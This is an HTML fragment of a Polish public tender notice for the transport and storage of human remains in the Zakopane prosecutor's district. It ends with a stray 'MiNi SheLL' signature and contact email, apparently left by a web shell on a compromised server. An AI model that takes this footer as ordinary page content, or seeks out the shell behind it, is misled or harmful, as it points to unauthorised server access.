<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie ZADANIA NR 6 dotyczy: 
Rejon działania Prokuratury Rejonowej w Zakopanem: miasto Zakopane
gminy: Zakopane, Biały Dunajec, Bukowina Tatrzańska, Poronin, Kościelisko,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com